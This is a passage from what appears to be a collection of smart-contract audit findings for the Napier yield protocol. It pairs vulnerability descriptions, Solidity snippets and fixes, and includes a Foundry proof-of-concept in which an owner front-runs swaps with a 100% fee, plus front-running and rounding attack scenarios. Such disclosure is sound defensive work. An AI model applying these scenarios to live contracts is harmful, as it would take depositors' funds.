_targetBufferPercentage) external onlyRebalancer {\\n if (_targetBufferPercentage < MIN_BUFFER_PERCENTAGE || _targetBufferPercentage > BUFFER_PERCENTAGE_PRECISION) {\\n revert InvalidBufferPercentage();\\n }\\n targetBufferPercentage = _targetBufferPercentage;\\n }\\n```\\n\\nThe owner calls the `setRebalancer` function again and sets the rebalancer address to `address(0)`. As such, no one has the ability to call functions that are only accessible by rebalancer. The `requestWithdrawal` and `requestWithdrawalAll` functions are only accessible by rebalancer. Thus, no one can call these two functions to replenish the ETH buffer in the adaptor contract.\\nWhen this state is reached, users can no longer withdraw their assets from the protocol, and their assets are stuck in the contract. This effectively causes them to lose their assets.чTo prevent the above scenario, the minimum `targetBufferPercentage` should be set to a higher percentage such as 5 or 10%, and the `requestWithdrawal` function should be made permissionless, so that even if the rebalancer does not do its job, anyone else can still initiate the rebalancing process to replenish the adaptor's ETH buffer for user's withdrawal.чLoss of assets for the victim.ч```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n -Unable to deposit to Tranche/Adaptor under certain conditionsчmediumчMinting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate.\\nThe user cannot deposit into the Tranche to issue new PT + YT under certain conditions.\\nThe comment in Line 133 below mentioned that the `stakeAmount` can be zero.\\nThe reason is that when `targetBufferEth < (availableEth + queueEthCache)`, it is possible that there is a pending withdrawal request (queueEthCache) and no available ETH left in the buffer (availableEth = 0). Refer to the comment in Line 123 below.\\nAs a result, the code at Line 127 below will restrict the amount of ETH to be staked and set the `stakeAmount` to zero.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n\\nHowever, the issue is that when `_stake` function is called with `stakeAmount` set to zero, it will result in zero ETH being staked and Line 77 below will revert.\\n```\\nFile: StEtherAdapter.sol\\n /// @inheritdoc BaseLSTAdapter\\n /// @dev Lido has a limit on the amount of ETH that can be staked.\\n /// @dev Need to check the current staking limit before staking to prevent DoS.\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n }\\n```\\n\\nA similar issue also occurs for the sFRXETH adaptor. If `FRXETH_MINTER.submit` function is called with `stakeAmount == 0`, it will revert.\\n```\\nFile: SFrxETHAdapter.sol\\n /// @notice Mint sfrxETH using WETH\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n }\\n```\\n\\nThe following shows that the `FRXETH_MINTER.submit` function will revert if submitted ETH is zero below.\\n```\\n/// @notice Mint frxETH to the recipient using sender's funds. Internal portion\\nfunction _submit(address recipient) internal nonReentrant {\\n // Initial pause and value checks\\n require(!submitPaused, \"Submit is paused\");\\n require(msg.value != 0, \"Cannot submit 0\");\\n```\\nчShort-circuit the `_stake` function by returning zero value immediately if the `stakeAmount` is zero.\\nFile: StEtherAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n}\\n```\\n\\nFile: SFrxETHAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n}\\n```\\nчMinting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate. The user cannot deposit into the Tranche to issue new PT + YT under certain conditions. Breaking of core protocol/contract functionality.ч```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n -Napier pool owner can unfairly increase protocol fees on swaps to earn more revenueчmediumчCurrently there is no limit to how often a `poolOwner` can update fees which can be abused to earn more fees by charging users higher swap fees than they expect.\\nThe `NapierPool::setFeeParameter` function allows the `poolOwner` to set the `protocolFeePercent` at any point to a maximum value of 100%. The `poolOwner` is a trusted party but should not be able to abuse protocol settings to earn more revenue. There are no limits to how often this can be updated.\\n```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(\"protocolFeePercent\", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, \"fee should be charged\");\\n }\\n```\\nчIntroduce a delay in fee updates to ensure users receive the fees they expect.чA malicious `poolOwner` could change the protocol swap fees unfairly for users by front-running swaps and increasing fees to higher values on unsuspecting users. An example scenario is:\\nThe `poolOwner` sets swap fees to 1% to attract users\\nThe `poolOwner` front runs all swaps and changes the swap fees to the maximum value of 100%\\nAfter the swap the `poolOwner` resets `protocolFeePercent` to a low value to attract more usersч```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(\"protocolFeePercent\", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, \"fee should be charged\");\\n }\\n```\\n -Benign esfrxETH holders incur more loss than expectedчmediumчMalicious esfrxETH holders can avoid \"pro-rated\" loss and have the remaining esfrxETH holders incur all the loss due to the fee charged by FRAX during unstaking. As a result, the rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.\\n```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n\\nIn the SFrxETHAdapter's comments above, it is stated that the share price will decrease due to the fee taken by FRAX during the withdrawal request. This loss is supposed to be 'pro-rated' among all esfrxETH holders. However, this report reveals that malicious esfrxETH holders can circumvent this 'pro-rated' loss, leaving the remaining esfrxETH holders to bear the entire loss. Furthermore, the report demonstrates that the current mitigation measure, which allows only authorized rebalancers to request withdrawals, is insufficient to prevent this exploitation.\\nWhenever a rebalancers submit a withdrawal request to withdraw staked ETH from FRAX, it will first reside in the mempool of the blockchain and anyone can see it. Malicious esfrxETH holders can front-run it to withdraw their shares from the adaptor.\\nWhen the withdrawal request TX is executed, the remaining esfrxETH holders in the adaptor will incur the fee. Once executed, the malicious esfrxETH deposits back to the adaptors.\\nNote that no fee is charged to the users for any deposit or withdrawal operation. Thus, as long as the gain from this action is more than the gas cost, it makes sense for the esfrxETH holders to do so.чThe best way to discourage users from withdrawing their assets and depositing them back to take advantage of a particular event is to impose a fee upon depositing and withdrawing.чThe rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.ч```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n -Lack of slippage control for `issue` functionчmediumчThe lack of slippage control for `issue` function can lead to a loss of assets for the affected users.\\nDuring the issuance, the user will deposit underlying assets (e.g., ETH) to the Tranche contract, and the Tranche contract will forward them to the Adaptor contract for depositing at Line 208 below. The number of shares minted is depending on the current scale of the adaptor. The current scale of the adaptor can increase or decrease at any time, depending on the current on-chain condition when the transaction is executed. For instance, the LIDO's daily oracle/rebase update will increase the stETH balance, which will, in turn, increase the adaptor's scale. On the other hand, if there is a mass validator slashing event, the ETH claimed from the withdrawal queue will be less than expected, leading to a decrease in the adaptor's scale. Thus, one cannot ensure the result from the off-chain simulation will be the same as the on-chain execution.\\nHaving said that, the number of shared minted will vary (larger or smaller than expected) if there is a change in the current scale. Assuming that Alice determined off-chain that depositing 100 ETH would issue $x$ amount of PT/YT. When she executes the TX, the scale increases, leading to the amount of PT/YT issued being less than $x$. The slippage is more than what she can accept.\\nIn summary, the `issue` function lacks the slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\nчImplement a slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.чLoss of assets for the affected users.ч```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n -Users unable to withdraw their funds due to FRAX admin actionчmediumчFRAX admin action can lead to the fund of Naiper protocol and its users being stuck, resulting in users being unable to withdraw their assets.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered \"RESTRICTED\". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nWhen the Adaptor needs to unstake its staked ETH to replenish its ETH buffer so that users can redeem/withdraw their funds, it will first join the FRAX's redemption queue, and the queue will issue a redemption NFT afterward. After a certain period, the adaptor can claim their ETH by burning the redemption NFT at Line 65 via the `burnRedemptionTicketNft` function.\\n```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n\\nHowever, it is possible for FRAX's admin to disrupt the redemption process of the adaptor, resulting in Napier users being unable to withdraw their funds. When the `burnRedemptionTicketNft` function is executed, the redemption NFT will be burned, and native ETH residing in the `FraxEtherRedemptionQueue` contract will be sent to the adaptor at Line 498 below\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function burnRedemptionTicketNft(uint256 _nftId, address payable _recipient) external nonReentrant {\\n..SNIP..\\n // Effects: Burn frxEth to match the amount of ether sent to user 1:1\\n FRX_ETH.burn(_redemptionQueueItem.amount);\\n\\n // Interactions: Transfer ETH to recipient, minus the fee\\n (bool _success, ) = _recipient.call{ value: _redemptionQueueItem.amount }(\"\");\\n if (!_success) revert InvalidEthTransfer();\\n```\\n\\nFRAX admin could execute the `recoverEther` function to transfer out all the Native ETH residing in the `FraxEtherRedemptionQueue` contract, resulting in the NFT redemption failing due to lack of ETH.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Recover ETH from exits where people early exited their NFT for frxETH, or when someone mistakenly directly sends ETH here\\n /// @param _amount Amount of ETH to recover\\n function recoverEther(uint256 _amount) external {\\n _requireSenderIsTimelock();\\n\\n (bool _success, ) = address(msg.sender).call{ value: _amount }(\"\");\\n if (!_success) revert InvalidEthTransfer();\\n\\n emit RecoverEther({ recipient: msg.sender, amount: _amount });\\n }\\n```\\n\\nAs a result, Napier users will not be able to withdraw their funds.чEnsure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.чThe fund of Naiper protocol and its users will be stuck, resulting in users being unable to withdraw their assets.ч```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n -Users are unable to collect their yield if tranche is pausedчmediumчUsers are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.\\nPer the contest's README page, it stated that the admin/owner is \"RESTRICTED\". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe admin of the protocol has the ability to pause the Tranche contract, and no one except for the admin can unpause it. If a malicious admin paused the Tranche contract, the users will not be able to collect their yield earned, leading to a loss of assets for them.\\n```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n\\nThe following shows that the `collect` function can only be executed when the system is not paused.\\n```\\nFile: Tranche.sol\\n function collect() public nonReentrant whenNotPaused returns (uint256) {\\n uint256 _lscale = lscales[msg.sender];\\n uint256 accruedInTarget = unclaimedYields[msg.sender];\\n```\\nчConsider allowing the users to collect yield even when the system is paused.чUsers are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.ч```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n -`swapUnderlyingForYt` revert due to rounding issuesчmediumчThe core function (swapUnderlyingForYt) of the Router will revert due to rounding issues. Users who intend to swap underlying assets to YT tokens via the Router will be unable to do so.\\nThe `swapUnderlyingForYt` allows users to swap underlying assets to a specific number of YT tokens they desire.\\n```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n\\nLine 353-354 above compute the number of underlying deposits needed to send to the Tranche to issue the amount of YT token the users desired. It attempts to add a buffer of 0.01 bps buffer to prevent rounding errors that could lead to insufficient PT being repaid to the pool and result in a revert. During the audit, it was found that this buffer is ineffective in achieving its purpose.\\nThe following example/POC demonstrates a revert could still occur due to insufficient PT being repaid despite having a buffer:\\nLet the state be the following:\\ncscale = 1.2e18\\nmaxScale = 1.25e18\\nytOutDesired = 123\\nissuanceFee = 0% (For simplicity's sake, the fee is set to zero. Having fee or not does not affect the validity of this issue as this is a math problem)\\nThe following computes the number of underlying assets to be transferred to the Tranche to mint/issue PY + YT\\n```\\nuDepositNoFee = cscale * ytOutDesired / maxscale;\\nuDepositNoFee = 1.2e18 * 123 / 1.25e18 = 118.08 = 118 (Round down)\\n\\nuDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1))\\nuDeposit = 118 * 10000 / (10000 - (0 + 1)) = 118.0118012 = 118 (Round down)\\n```\\n\\nSubsequently, the code will perform a flash-swap via the `swapPtForUnderlying` function. It will borrow 123 PT from the pool, which must be repaid later.\\nIn the swap callback function, the code will transfer 118 underlying assets to the Tranche and execute the `Tranche.issue` function to mint/issue PY + YT.\\nWithin the `Tranche.issue` function, it will trigger the `adapter.prefundedDeposit()` function to mint the estETH/shares. The following is the number of estETH/shares minted:\\n```\\nshares = assets * (total supply/total assets)\\nsahres = 118 * 100e18 / 120e18 = 98.33333333 = 98 shares\\n```\\n\\nNext, Line 219 below of the `Tranche.issue` function will compute the number of PY+YT to be issued/minted\\n```\\nissued = (sharesUsed - fee).mulWadDown(_maxscale);\\nissued = (sharesUsed - 0).mulWadDown(_maxscale);\\nissued = sharesUsed.mulWadDown(_maxscale);\\n\\nissued = sharesUsed * _maxscale / WAD\\nissued = 98 * 1.25e18 / 1e18 = 122.5 = 122 PT (Round down)\\n```\\n\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n```\\n\\nAt the end of the `Tranche.issue` function, 122 PY + YT is issued/minted back to the Router.\\nNote that 123 PT was flash-loaned earlier, and 123 PT needs to be repaid. Otherwise, the code at Line 164 below will revert. The main problem is that only 122 PY was issued/minted (a shortfall of 1 PY). Thus, the swap TX will revert at the end.\\n```\\nFile: NapierRouter.sol\\n function swapCallback(int256 underlyingDelta, int256 ptDelta, bytes calldata data) external override {\\n..SNIP..\\n uint256 pyIssued = params.pt.issue({to: address(this), underlyingAmount: params.underlyingDeposit});\\n\\n // Repay the PT to Napier pool\\n if (pyIssued < pyDesired) revert Errors.RouterInsufficientPtRepay();\\n```\\nчThe buffer does not appear to be the correct approach to manage this rounding error. One could increase the buffer from 0.01% to 1% and solve the issue in the above example, but a different or larger number might cause a rounding error to surface again. Also, a larger buffer means that many unnecessary PTs will be issued.\\nThus, it is recommended that a round-up division be performed when computing the `uDepositNoFee` and `uDeposit` using functions such as `divWadUp` so that the issued/minted PT can cover the debt.чThe core function (swapUnderlyingForYt) of the Router will break. Users who intend to swap underlying assets to YT tokens via the Router will not be able to do so.ч```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n -FRAX admin can adjust fee rate to harm Napier and its usersчmediumчFRAX admin can adjust fee rates to harm Napier and its users, preventing Napier users from withdrawing.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered \"RESTRICTED\". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nFollowing is one of the ways that FRAX admin can harm Napier and its users.\\nFRAX admin can set the fee to 100%.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n\\nWhen the adaptor attempts to redeem the staked ETH from FRAX via the `enterRedemptionQueue` function, the 100% fee will consume the entire amount of the staked fee, leaving nothing for Napier's adaptor.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function enterRedemptionQueue(address _recipient, uint120 _amountToRedeem) public nonReentrant {\\n // Get queue information\\n RedemptionQueueState memory _redemptionQueueState = redemptionQueueState;\\n RedemptionQueueAccounting memory _redemptionQueueAccounting = redemptionQueueAccounting;\\n\\n // Calculations: redemption fee\\n uint120 _redemptionFeeAmount = ((uint256(_amountToRedeem) * _redemptionQueueState.redemptionFee) /\\n FEE_PRECISION).toUint120();\\n\\n // Calculations: amount of ETH owed to the user\\n uint120 _amountEtherOwedToUser = _amountToRedeem - _redemptionFeeAmount;\\n\\n // Calculations: increment ether liabilities by the amount of ether owed to the user\\n _redemptionQueueAccounting.etherLiabilities += uint128(_amountEtherOwedToUser);\\n\\n // Calculations: increment unclaimed fees by the redemption fee taken\\n _redemptionQueueAccounting.unclaimedFees += _redemptionFeeAmount;\\n\\n // Calculations: maturity timestamp\\n uint64 _maturityTimestamp = uint64(block.timestamp) + _redemptionQueueState.queueLengthSecs;\\n\\n // Effects: Initialize the redemption ticket NFT information\\n nftInformation[_redemptionQueueState.nextNftId] = RedemptionQueueItem({\\n amount: _amountEtherOwedToUser,\\n maturity: _maturityTimestamp,\\n hasBeenRedeemed: false,\\n earlyExitFee: 